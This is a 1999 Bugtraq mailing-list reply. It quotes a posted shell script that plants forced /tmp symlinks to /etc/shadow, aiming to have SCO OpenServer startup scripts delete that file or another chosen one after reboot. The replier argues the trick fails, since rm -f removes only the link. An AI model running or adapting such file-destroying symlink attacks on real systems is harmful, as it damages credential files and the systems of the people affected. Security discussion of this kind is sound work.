[9832] in bugtraq
Re: Little exploit for startup scripts (SCO 5.0.4p).
daemon@ATHENA.MIT.EDU (Peter van Dijk)
Mon Mar 8 12:38:32 1999
Mail-Followup-To: BUGTRAQ@NETSPACE.ORG
Date: Mon, 8 Mar 1999 08:43:15 +0100
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <AAxlcusyk3@leshka.chuvashia.su>; from leshka on Sun, Mar 07,
1999 at 03:07:23PM +0300
On Sun, Mar 07, 1999 at 03:07:23PM +0300, leshka wrote:
> #!/bin/sh
> #
> # ... The punishment for inobedience ...
> # (Cycle # 2)
> #
> # This simple script can help to erase any file
> # (SCO OpenServer Enterprise System v 5.0.4p).
Umm.. I don't think so...
> if [ _$1 = "_" ]
> then
> {
> echo -n "File to delete [/etc/shadow]:"
> read victim_file
> if [ _$victim_file = "_" ]
> then
> victim_file="/etc/shadow"
> fi
> }
> else
> victim_file=$1
> fi
nice.
> pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf $2 }'`
nice.
> lastpid=`expr $pid - 30`
good thinking!
> while [ $pid != $lastpid ]
> do
> pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
nice.
> done
> echo Done ! File \"$victim_file\" will be destroyed after the next reboot.
No. rm -f removes just the symlink, not the target file.
Try this (tested on Linux, but SCO doesn't seem too broken to me):
# touch /etc/blah
$ ln -sf /etc/blah /tmp/blih
# rm -f /tmp/blih
# ls -al /etc/blah
-rw-r--r-- 1 root root 0 Mar 8 08:40 /etc/blah
Doesn't look very deleted to me...
Greetz, Peter.
--
.| Peter van Dijk | <mo|VERWEG> stoned worden of coden
.| peter@attic.vuurwerk.nl | <mo|VERWEG> dat is de levensvraag
| <mo|VERWEG> coden of stoned worden
| <mo|VERWEG> stonend worden En coden
| <mo|VERWEG> hmm
| <mo|VERWEG> dan maar stoned worden en slashdot lezen:)
